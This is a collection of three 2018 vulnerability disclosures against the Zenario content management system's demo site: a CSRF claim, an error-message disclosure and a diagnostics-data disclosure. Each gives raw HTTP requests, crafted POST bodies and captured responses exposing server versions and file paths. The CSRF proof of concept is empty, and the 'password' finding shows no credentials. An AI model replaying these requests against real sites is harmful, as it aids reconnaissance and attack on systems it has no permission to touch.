--------------------------- # Exploit Title: Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) # Software Link: https://zenar.io/ # Dork: N/A # Author: Ismail Tasdelen # Tested Website: http://demo.zenar.io # Date: 2018-05-21 # Category: Web Application # POC : # GET Request : Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0 Request Method: GET Status Code: 200 OK Remote Address: 213.146.173.88:80 Referrer Policy: no-referrer-when-downgrade Accept: text/plain, */*; q=0.01 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: keep-alive Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1 Host: demo.zenar.io Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36 X-Requested-With: XMLHttpRequest # Query String Parametres : path: zenario__content/panels/content skinId: refinerId: html refinerName: content_type refiner__content_type: html _limit: 50 _start: 0 _item: html_10 _sort_col: first_created_datetime _sort_desc: 0 # CSRF HTML : Zenar Content Management System - Cross-Site Request Forgery ( CSRF )

--------------------------- # Exploit Title: Zenar Content Management System - Disclosure Sensitive Data # Software Link: https://zenar.io/ # Dork: N/A # Author: Ismail Tasdelen # Tested Website: http://demo.zenar.io # Date: 2018-05-22 # Category: Web Application # POC : Description : This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages. Parameters : /zenario/admin/welcome.ajax.php Example : http://localhost/zenario/admin/welcome.ajax.php Attack details : URL encoded POST input _box was set to %7B%22tab%22%3A%22login%22%2C%22tabs%22%3A%7B%22login%22%3A%7B%22 edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22reset%22%3A%7B%22_was_hidden_before%22%3A true%7D%2C%22description%22%3A%7B%7D%2C%22username%22%3A%7B%22current_value%22%3A%22e%22%7D%2C%22password %22%3A%7B%22current_value%22%3A%22%22%7D%2C%22remember_me%22%3A%7B%22current_value%22%3Afalse%7D%2C%22 login%22%3A%7B%22pressed%22%3Afalse%7D%2C%22forgot%22%3A%7B%22pressed%22%3Atrue%7D%2C%22previous %22%3A%7B%22pressed%22%3Afalse%7D%7D%7D%2C%22forgot%22%3A%7B%22edit_mode%22%3A%7B%22on%22%3A%221%22%7D%2C%22 fields%22%3A%7B%22description%22%3A%7B%7D%2C%22email%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22previous %22%3A%7B%7D%2C%22reset%22%3A%7B%7D%7D%7D%7D%2C%22path%22%3A%22login%22%7D Error message found: Warning: json_decode() expects parameter 1 to be string, array given in /var/www/zenario-source/Zenario-8.1/zenario/admin/welcome.ajax.php on line 82
Request : POST /zenario/admin/welcome.ajax.php?get=[]&task= HTTP/1.1 Content-Length: 782 Content-Type: application/x-www-form-urlencoded Referer: http://demo.zenar.io:80/zenario/admin/organizer.php?fromCID=1&fromCType=html Cookie: PHPSESSID=j1n5kr9af7k6iqcdmbq1pgudp4 Host: demo.zenar.io Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: */* _box[]=%7B%22tab%22%3A%22login%22%2C%22tabs%22%3A%7B%22login%22%3A%7B%22edit_mode %22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22reset%22%3A%7B%22_was_hidden_before %22%3Atrue%7D%2C%22description%22%3A%7B%7D%2C%22username%22%3A%7B%22current_value %22%3A%22e%22%7D%2C%22password%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22 remember_me%22%3A%7B%22current_value%22%3Afalse%7D%2C%22login%22%3A%7B%22pressed %22%3Afalse%7D%2C%22forgot%22%3A%7B%22pressed%22%3Atrue%7D%2C%22previous%22%3A%7B%22 pressed%22%3Afalse%7D%7D%7D%2C%22forgot%22%3A%7B%22edit_mode %22%3A%7B%22on%22%3A%221%22%7D%2C%22fields%22%3A%7B%22description%22%3A%7B%7D%2C%22 email%22%3A%7B%22current_value%22%3A%22%22%7D%2C%22previous%22%3A%7B%7D%2C%22 reset%22%3A%7B%7D%7D%7D%7D%2C%22path%22%3A%22login%22%7D&_validate=true Response : HTTP/1.1 200 OK Date: Mon, 21 May 2018 20:52:01 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=j1n5kr9af7k6iqcdmbq1pgudp4; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 2568 Keep-Alive: timeout=5, max=19 Connection: Keep-Alive Content-Type: text/javascript; charset=UTF-8 Original-Content-Encoding: gzip The impact of this vulnerability : The error messages may disclose sensitive information. This information can be used to launch further attacks. How to fix this vulnerability : Review the source code for this script. --------------------------- # Exploit Title: Zenar Content Management System - Disclosure Username/Password Sensitive Data # Software Link: https://zenar.io/ # Dork: N/A # Author: Ismail Tasdelen # Tested Website: http://demo.zenar.io # Date: 2018-05-22 # Category: Web Application # POC : Description : A username and/or password was found in this file. This information could be sensitive. Example : http://localhost/zenario/admin/welcome.ajax.php # DATA : {"key":{"first_viewing":false},"tab":"0","tabs":[{"edit_mode":{"enabled":"1","on":"1","always_on":"1"},"show_errors_after_field":"description","fields":{"description":{"full_width":"1","snippet":{"html":"

Diagnostics<\/h1>"},"ord":1},"sub_table":{"type":"grouping","name":"sub_table","ord":2,"value":""},"system_requirements":{"grouping":"sub_table","full_width":"1","snippet":{"html":"System Requirements"},"visible_if":"zenarioAW.togglePressed(1)","ord":3,"row_class":"section_valid"},"show_system_requirements":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":4},"server":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Web Server"},"visible_if":"zenarioAW.togglePressed(2)","ord":5},"show_server":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":6},"server_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"Apache http server version 2.4.7 or later"},"visible_if":"zenarioAW.togglePressed()","ord":7,"post_field_html":" (you have version Server version: Apache\/2.4.18 (Ubuntu) Server built: 2017-09-18T15:09:02<\/em>)"},"php":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"PHP"},"visible_if":"zenarioAW.togglePressed(2)","ord":8},"show_php":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":9},"php_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"PHP version 7.0 or later"},"visible_if":"zenarioAW.togglePressed()","ord":10,"post_field_html":" (you have version 7.0.28-0ubuntu0.16.04.1<\/em>)"},"opcache_misconfigured":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"In your php.ini<\/code> you have opcache.enable<\/code>\nturned on, and you have opcache.dups_fix<\/code> turned off.\n\nThis may cause occasional PHP “fatal errors” on your site.\n\nPlease edit your php.ini<\/code> and either turn opcache.enable<\/code> off\nor else turn opcache.dups_fix<\/code> on."},"visible_if":"zenarioAW.togglePressed()","ord":11,"hidden":true},"mysql":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"MySQL"},"visible_if":"zenarioAW.togglePressed(2)","ord":12},"show_mysql":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":13},"mysql_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"MySQLi extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":14},"mysql_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"MySQL client and MySQL server version 5.5.3 or later"},"visible_if":"zenarioAW.togglePressed()","ord":15,"post_field_html":" (your client is version mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine wrapper<\/em>)"},"mb":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Unicode Support"},"visible_if":"zenarioAW.togglePressed(2)","ord":16},"show_mb":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":17},"mb_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"ctype extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":18},"mb_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"mbstring extension enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":19},"gd":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Image Manipulation"},"visible_if":"zenarioAW.togglePressed(2)","ord":20},"show_gd":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":21},"gd_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"GD Library enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":22},"gd_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"GIF Read Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":23},"gd_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"JPG Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":24},"gd_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"PNG Support enabled in PHP"},"visible_if":"zenarioAW.togglePressed()","ord":25},"optional":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Optional requirements"},"visible_if":"zenarioAW.togglePressed(2)","ord":26},"show_optional":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":27},"optional_mod_deflate":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"deflate module enabled in Apache\nNeeded for compressing files, for a faster page-load<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":28},"optional_mod_expires":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"expires module enabled in Apache\nNeeded for images and files to be cached in the visitors browser, for a faster page-load<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":29},"optional_mod_rewrite":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"rewrite module enabled in Apache\nNeeded for friendly URLs<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":30},"optional_curl":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"curl extension enabled in PHP\nNeeded for translating pages using Google Translate<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":31},"optional_zip":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"zip extension enabled in PHP\nNeeded for creating document extracts<\/small>"},"visible_if":"zenarioAW.togglePressed()","ord":32},"dirs":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Directories"},"visible_if":"zenarioAW.togglePressed(1)","ord":33,"row_class":"section_valid"},"show_dirs":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":34},"dir_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Backup Storage Area"},"visible_if":"zenarioAW.togglePressed(2)","ord":35},"show_dir_1":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":36},"dir_1_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"If you wish to store site backups on your server, you should create a directory\non your server in which to keep them.\nIt should start with a slash, but do not add a trailing slash."},"visible_if":"zenarioAW.togglePressed()","ord":37},"backup_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","visible_if":"zenarioAW.togglePressed()","ord":38,"value":"\/var\/www\/clients\/zenario_demo\/backup","readonly":true},"backup_dir_status":{"grouping":"sub_table","full_width":"1","snippet":{"html":"The directory backup<\/code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":39,"row_class":"sub_valid"},"dir_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Document Secure Store (Docstore)"},"visible_if":"zenarioAW.togglePressed(2)","ord":40},"show_dir_2":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":41},"dir_2_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"You should create a directory on your server where Documents can be stored by the CMS.\nPlease enter the absolute path to the directory.\nIt should start with a slash, but do not add a trailing slash."},"visible_if":"zenarioAW.togglePressed()","ord":42},"docstore_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","visible_if":"zenarioAW.togglePressed()","ord":43,"value":"\/var\/www\/clients\/zenario_demo\/docstore_staging","readonly":true},"docstore_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory docstore_staging<\/code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":44},"dir_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Templates Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":45},"show_dir_3":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":46},"dir_3_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses template files to form the layout of web pages.\nThese may be edited by an administrator, and Zenario writes them to the following directory.\nPlease ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":47},"template_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":48,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/zenario_custom\/templates\/grid_templates"},"template_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory grid_templates<\/code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":49},"dir_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"CSS Directories"},"visible_if":"zenarioAW.togglePressed(2)","ord":50,"hidden":false},"show_dir_4":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":51,"hidden":false},"dir_4_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"CSS for plugins may be edited by an administrator, and Zenario writes CSS files to the following directory. Please ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":52,"hidden":false},"skin_dir_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":53,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/zenario_custom\/templates\/grid_templates\/skins\/deep_dive\/editable_css\/","current_value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/zenario_custom\/templates\/grid_templates\/skins\/deep_dive\/editable_css\/","hidden":false},"skin_dir_status_1":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The directory editable_css<\/code> exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":54,"hidden":false},"skin_dir_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":55,"value":"","hidden":true},"skin_dir_status_2":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":56,"hidden":true},"skin_dir_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":57,"value":"","hidden":true},"skin_dir_status_3":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":58,"hidden":true},"skin_dir_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":59,"value":"","hidden":true},"skin_dir_status_4":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":60,"hidden":true},"skin_dir_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":61,"value":"","hidden":true},"skin_dir_status_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":62,"hidden":true},"skin_dir_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":63,"value":"","hidden":true},"skin_dir_status_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":64,"hidden":true},"skin_dir_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":65,"value":"","hidden":true},"skin_dir_status_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":66,"hidden":true},"skin_dir_8":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":67,"value":"","hidden":true},"skin_dir_status_8":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":68,"hidden":true},"skin_dir_9":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":69,"value":"","hidden":true},"skin_dir_status_9":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":" "},"visible_if":"zenarioAW.togglePressed()","ord":70,"hidden":true},"dir_5":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Cache Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":71},"show_dir_5":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":72},"dir_5_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario can store generated files in a cache directory to speed up performance and reduce load on the database.\nPlease ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":73},"cache_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":74,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/cache"},"cache_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "cache" directory exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":75},"dir_6":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Private Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":76},"show_dir_6":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":77},"dir_6_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses a cache directory to store documents and images temporarily\nwhile they are downloaded by users.\nPlease ensure it exists and is writable by the web server:"},"visible_if":"zenarioAW.togglePressed()","ord":78},"private_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":79,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/private"},"private_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "private" directory exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":80},"dir_7":{"grouping":"sub_table","full_width":"1","row_class":"sub_section_valid","snippet":{"html":"Public Directory"},"visible_if":"zenarioAW.togglePressed(2)","ord":81},"show_dir_7":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","visible_if":"zenarioAW.togglePressed(2, tuixObject)","ord":82},"dir_7_blurb":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","snippet":{"html":"Zenario uses a directory to store documents that are publicly available.\nThis directory MUST be writable by the web server."},"visible_if":"zenarioAW.togglePressed()","ord":83},"public_dir":{"grouping":"sub_table","full_width":"1","row_class":"sub_field","type":"text","readonly":"readonly","visible_if":"zenarioAW.togglePressed()","ord":84,"value":"\/var\/www\/clients\/zenario_demo\/public_html_live\/public"},"public_dir_status":{"grouping":"sub_table","full_width":"1","row_class":"sub_valid","snippet":{"html":"The "public" directory exists and is writable."},"visible_if":"zenarioAW.togglePressed()","ord":85},"site":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Site configuration"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1)","ord":86,"row_class":"section_warning"},"show_site":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":87,"pressed":true},"site_description_missing":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"This site's description file is missing.\nPlease create the zenario_custom\/site_description.yaml<\/code> file,\ne.g. by copying or symlinking one of the files from the\nzenario\/api\/sample_site_descriptions\/<\/code> directory."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":88,"hidden":true},"site_disabled":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"Your site is enabled."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":89},"site_special_pages_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":90,"hidden":true},"public_documents":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":91,"hidden":true},"site_automated_backups":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"Automated backups are running."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":92},"scheduled_task_manager":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":93,"hidden":true},"spare_domains_without_primary_domain":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"Domain name redirects have been created for this site, but they will not function because no primary domain is defined.\nPlease go to\n\n Domains<\/em> in the site settings\n<\/a>\nto define a primary domain."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":94,"hidden":true},"forwarded_ip_misconfigured":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"The USE_FORWARDED_IP<\/code> constant is enabled\nin your zenario_siteconfig.php<\/code> file,\nbut you are not using a load balancer or a proxy,\nor your load balancer or proxy is misconfigured."},"visible_if":"zenarioAW.togglePressed()","ord":95,"hidden":true},"errors_not_shown":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"Your site is in development mode,\nbut if you're developing modules you would not be able to see PHP errors and notices.\n(The ERROR_REPORTING_LEVEL<\/code>\nshould be set to (E_ALL | E_NOTICE | E_STRICT)<\/code>\nin your zenario_siteconfig.php<\/code> file - or\nclick the hammer icon at the bottom left of Organizer\nto fully enable the site.)"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":96,"hidden":false},"notices_shown":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":"Your site is in production mode, but you are showing PHP notices.\n\n(The ERROR_REPORTING_LEVEL<\/code>\nshould be set to (E_ALL & ~E_NOTICE & ~E_STRICT)<\/code>\nin your zenario_siteconfig.php<\/code> file.)"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":97,"hidden":true},"email_addresses_overridden":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":98,"hidden":true},"missing_modules":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":99,"hidden":true},"bad_extra_module_symlinks":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":100,"hidden":true},"module_errors":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":101,"hidden":true},"no_ssl_for_login":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"This site has a login for extranet users,\nbut doesn't use HTTPS to secure the transmission of passwords and other personal data.\nWe recommend you ask your system administrator to make this site run using HTTPS."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":102,"hidden":false},"two_factor_security":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"This site contains user-related data,\nbut you are not protecting your admin-login with two-factor authentication.\nPlease edit the zenario_custom\/site_description.yaml<\/code> file\nto enable two-factor authentication."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":103,"hidden":false},"robots_txt":{"grouping":"sub_table","full_width":"1","row_class":"sub_level","snippet":{"html":""},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":104,"hidden":true},"content":{"grouping":"sub_table","full_width":"1","snippet":{"html":"Site content"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1)","ord":105,"row_class":"section_warning"},"show_content":{"grouping":"sub_table","type":"toggle","redraw_onchange":"1","same_row":"1","hide_on_install":"1","visible_if":"zenarioAW.togglePressed(1, tuixObject)","ord":106,"pressed":true},"content_nothing_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"valid","snippet":{"html":"You have no unpublished content items."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":107,"hidden":true},"content_unpublished_1":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>html_44\/news-list<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":108,"hidden":false},"content_unpublished_2":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>html_43\/gallery<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":109,"hidden":false},"content_unpublished_3":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>news_5\/news-1<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":110,"hidden":false},"content_unpublished_4":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>news_6\/news-2<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":111,"hidden":false},"content_unpublished_5":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"<\/span>html_41\/home-staging<\/a> is in draft mode."},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":112,"hidden":false},"content_more_unpublished":{"grouping":"sub_table","full_width":"1","row_class":"warning","snippet":{"html":"3 other pages are in draft mode. View...<\/a>"},"hide_on_install":"1","visible_if":"zenarioAW.togglePressed()","ord":113,"hidden":false},"continue":{"value":"Continue","type":"submit","full_width":"1","style":"float: right;","ord":114},"check_again":{"value":"Check again","type":"submit","same_row":"1","style":"float: right;","ord":115,"hidden":false},"skin_dir_status_0":{"hidden":false},"skin_dir_0":{"hidden":false}},"ord":1,"errors":[]}],"path":"diagnostics","_task":false} The impact of this vulnerability : Possible sensitive information disclosure. How to fix this vulnerability : Remove this file from your website or change its permissions to remove access. # You want to follow my activity ? https://www.linkedin.com/in/ismailtasdelen https://github.com/ismailtasdelen https://twitter.com/ismailtsdln